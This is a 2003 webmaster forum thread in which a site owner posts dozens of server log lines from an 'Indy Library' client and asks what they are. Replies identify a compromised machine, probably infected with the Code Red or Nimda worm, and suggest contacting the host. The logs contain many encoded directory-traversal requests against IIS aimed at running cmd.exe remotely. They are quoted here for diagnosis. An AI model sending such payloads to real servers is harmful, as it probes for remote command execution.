homepage Welcome to WebmasterWorld Guest from 54.198.130.203
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Visit PubCon.com
Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

    
Indy Library - Chinese Spambot?
strange entries in my log file
bashyam




msg:400097
 6:19 am on Apr 21, 2003 (gmt 0)

Hi,

I found these unrelated entries in my logs frequetly... could anyone let me know what it is?
------------------------------------------------------------
24.226.39.127 - - [21/Apr/2003:00:48:07 -0400] "GET /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:08 -0400] "GET /..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:08 -0400] "GET /_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:09 -0400] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:10 -0400] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:10 -0400] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:11 -0400] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:12 -0400] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:13 -0400] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:14 -0400] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:15 -0400] "GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:18 -0400] "GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:19 -0400] "GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:20 -0400] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:20 -0400] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:21 -0400] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:21 -0400] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:22 -0400] "GET /iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:23 -0400] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:24 -0400] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:25 -0400] "GET /msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:26 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:26 -0400] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:27 -0400] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:27 -0400] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:28 -0400] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:29 -0400] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:29 -0400] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:30 -0400] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:31 -0400] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:32 -0400] "GET /msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:33 -0400] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:34 -0400] "GET /msdac/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:35 -0400] "GET /msdac/shell.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:36 -0400] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:37 -0400] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:46 -0400] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:47 -0400] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:48 -0400] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:49 -0400] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:49 -0400] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:50 -0400] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:51 -0400] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:52 -0400] "GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:53 -0400] "GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:54 -0400] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:55 -0400] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:56 -0400] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:57 -0400] "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:00 -0400] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:05 -0400] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:05 -0400] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:06 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:10 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:10 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:11 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:12 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:13 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:14 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:15 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:15 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:16 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:17 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:18 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
------------------------------------------------------------

Thanks..

Balaji.

 

jrobbio




msg:400098
 6:42 am on Apr 21, 2003 (gmt 0)

Its a Chinese spam bot. Please be more selective with the category you choose for your posts. This is the Google section.

kwngian




msg:400099
 8:15 am on Apr 21, 2003 (gmt 0)

>Its a Chinese spam bot.

It is a "compromised" spam bot.

The IP address says its canadian.

Even the spammers have their day for having an unpatch windows machine.

[edited by: kwngian at 10:26 am (utc) on April 21, 2003]

bashyam




msg:400100
 8:51 am on Apr 21, 2003 (gmt 0)

Thanks for your reply.

Also, sorry to post this at Google section... by mistake I did that.

Balaji.

sullen




msg:400101
 9:12 am on Apr 21, 2003 (gmt 0)

don't know where the chinese spam bot idea came from - it's a machine infected with the Code red / Nimda worm.

You can't block it. The best thing to do is look up the ip address to find out which company hosts the machine and then write to them.

bull




msg:400102
 9:57 am on Apr 21, 2003 (gmt 0)

24.226.39.127 is not chinese:
Cogeco Cable Inc. COGECOWAVE-1 (NET-24-226-0-0-1)
24.226.0.0 - 24.226.127.255

Apart from this, Indy Library is a candidate blocked by many here: [webmasterworld.com...]

jan

jrobbio




msg:400103
 10:13 am on Apr 21, 2003 (gmt 0)
The Chinese bot thing came from a site and I quote:
[quote]Originally, the Indy Library is a programming library which is available at http://www.nevrona.com/Indy or http://indy.torry.net under an Open Source license. This library is included with Borland Delphi 6, 7, C++Builder 6, plus all of the Kylix versions. Unfortunately, this library is hi-jacked and abused by some Chinese spam bots. All recent user-agents with the unmodified "Indy Library" string were of Chinese origin.[/quote]
sullen




msg:400104
 12:03 pm on Apr 21, 2003 (gmt 0)

righty - missed the "Indy Library" part - I was just going on the addresses its trying to hit.

I would say contact the host is still the best advice though.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved